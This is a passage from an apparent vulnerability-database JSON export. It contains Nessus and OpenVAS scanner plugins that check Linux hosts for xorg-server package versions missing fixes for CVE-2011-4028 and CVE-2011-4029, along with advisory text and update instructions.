script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xorg-x11-server-rdp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.11.10.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.11.10.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"i586\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, cpu:\"x86_64\", reference:\"xorg-x11-server-rdp-7.3.99-3.18.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:51:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing updates announced in\nadvisory GLSA 201110-19.", "modified": "2017-07-07T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:70782", "href": "http://plugins.openvas.org/nasl.php?oid=70782", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-19 (xorg-server)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in the X.Org X server might allow local\n attackers to disclose information.\";\ntag_solution = \"All X.Org X Server 1.9 users should upgrade to the latest 1.9 version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.9.5-r1'\n \n\nAll X.Org X Server 1.10 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-base/xorg-server-1.10.4-r1'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-19\nhttp://bugs.gentoo.org/show_bug.cgi?id=387069\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-19.\";\n\n \n \nif(description)\n{\n script_id(70782);\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:40 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-19 (xorg-server)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"x11-base/xorg-server\", unaffected: make_list(\"rge 1.9.5-r1\", \"ge 1.10.4-r1\"), vulnerable: make_list(\"lt 1.10.4-r1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-03-17T23:03:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120267", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120267", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-104)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120267\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:58 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-104)\");\n script_tag(name:\"insight\", value:\"A flaw was found in the way the X.Org server handled lock files. A local user with access to the system console could use this flaw to determine the existence of a file in a directory not accessible to the user, via a symbolic link attack. (CVE-2011-4028 )A race condition was found in the way the X.Org server managed temporary lock files. A local attacker could use this flaw to perform a symbolic link attack, allowing them to make an arbitrary file world readable, leading to the disclosure of sensitive information. (CVE-2011-4029 )\");\n script_tag(name:\"solution\", value:\"Run yum update xorg-x11-server to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-104.html\");\n script_cve_id(\"CVE-2011-4029\", \"CVE-2011-4028\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.12.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "The remote host is missing an update for the ", "modified": "2019-03-12T00:00:00", "published": "2012-06-22T00:00:00", "id": "OPENVAS:1361412562310870775", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870775", "type": "openvas", "title": "RedHat Update for xorg-x11-server RHSA-2012:0939-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for xorg-x11-server RHSA-2012:0939-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-June/msg00036.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870775\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:26:29 +0530 (Fri, 22 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name:\"RHSA\", value:\"2012:0939-04\");\n script_name(\"RedHat Update for xorg-x11-server RHSA-2012:0939-04\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xorg-x11-server'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"xorg-x11-server on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"X.Org is an open source implementation of the X Window System. It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n\n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. (CVE-2011-4029)\n\n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n\n This update also fixes the following bugs:\n\n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n\n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple 'Device' sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n\n * Prior to this update, the misleading message 'Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor.' could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n\n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n\n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:07:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Check for the Version of xorg-x11-server-common", "modified": "2018-01-05T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881153", "href": "http://plugins.openvas.org/nasl.php?oid=881153", "type": "openvas", "title": "CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"X.Org is an open source implementation of the X Window System. It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n \n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. (CVE-2011-4029)\n \n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n \n This update also fixes the following bugs:\n \n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n \n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple "Device" sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n \n * Prior to this update, the misleading message "Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor." could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n \n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n \n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n not behave as expected. This update sets the values to the original driver\n values instead of the already transf ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"xorg-x11-server-common on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-July/018722.html\");\n script_id(881153);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:24:06 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"CESA\", value: \"2012:0939\");\n script_name(\"CentOS Update for xorg-x11-server-common CESA-2012:0939 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xorg-x11-server-common\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-devel\", rpm:\"xorg-x11-server-devel~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-source\", rpm:\"xorg-x11-server-source~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xdmx\", rpm:\"xorg-x11-server-Xdmx~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xnest\", rpm:\"xorg-x11-server-Xnest~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xvfb\", rpm:\"xorg-x11-server-Xvfb~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server\", rpm:\"xorg-x11-server~1.10.6~1.el6.centos\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:06:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4028", "CVE-2011-4029"], "description": "Check for the Version of xorg-x11-server", "modified": "2018-01-09T00:00:00", "published": "2012-06-22T00:00:00", "id": "OPENVAS:870775", "href": "http://plugins.openvas.org/nasl.php?oid=870775", "type": "openvas", "title": "RedHat Update for xorg-x11-server RHSA-2012:0939-04", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for xorg-x11-server RHSA-2012:0939-04\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"X.Org is an open source implementation of the X Window System. It provides\n the basic low-level functionality that full-fledged graphical user\n interfaces are designed upon.\n\n A flaw was found in the way the X.Org server handled lock files. A local\n user with access to the system console could use this flaw to determine the\n existence of a file in a directory not accessible to the user, via a\n symbolic link attack. (CVE-2011-4028)\n\n A race condition was found in the way the X.Org server managed temporary\n lock files. A local attacker could use this flaw to perform a symbolic link\n attack, allowing them to make an arbitrary file world readable, leading to\n the disclosure of sensitive information. (CVE-2011-4029)\n\n Red Hat would like to thank the researcher with the nickname vladz for\n reporting these issues.\n\n This update also fixes the following bugs:\n\n * Prior to this update, the KDE Display Manager (KDM) could pass invalid\n 24bpp pixmap formats to the X server. As a consequence, the X server could\n unexpectedly abort. This update modifies the underlying code to pass the\n correct formats. (BZ#651934, BZ#722860)\n \n * Prior to this update, absolute input devices, like the stylus of a\n graphic tablet, could become unresponsive in the right-most or bottom-most\n screen if the X server was configured as a multi-screen setup through\n multiple "Device" sections in the xorg.conf file. This update changes the\n screen crossing behavior so that absolute devices are always mapped across\n all screens. (BZ#732467)\n \n * Prior to this update, the misleading message "Session active, not\n inhibited, screen idle. If you see this test, your display server is broken\n and you should notify your distributor." could be displayed after resuming\n the system or re-enabling the display, and included a URL to an external\n web page. This update removes this message. (BZ#748704)\n \n * Prior to this update, the erroneous input handling code of the Xephyr\n server disabled screens on a screen crossing event. The focus was only on\n the screen where the mouse was located and only this screen was updated\n when the Xephyr nested X server was configured in a multi-screen setup.\n This update removes this code and Xephyr now correctly updates screens in\n multi-screen setups. (BZ#757792)\n \n * Prior to this update, raw events did not contain relative axis values. As\n a consequence, clients which relied on relative values for functioning did\n ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_affected = \"xorg-x11-server on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-June/msg00036.html\");\n script_id(870775);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-22 10:26:29 +0530 (Fri, 22 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"1.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-4028\", \"CVE-2011-4029\");\n script_xref(name: \"RHSA\", value: \"2012:0939-04\");\n script_name(\"RedHat Update for xorg-x11-server RHSA-2012:0939-04\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xorg-x11-server\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xephyr\", rpm:\"xorg-x11-server-Xephyr~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-Xorg\", rpm:\"xorg-x11-server-Xorg~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-common\", rpm:\"xorg-x11-server-common~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xorg-x11-server-debuginfo\", rpm:\"xorg-x11-server-debuginfo~1.10.6~1.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": 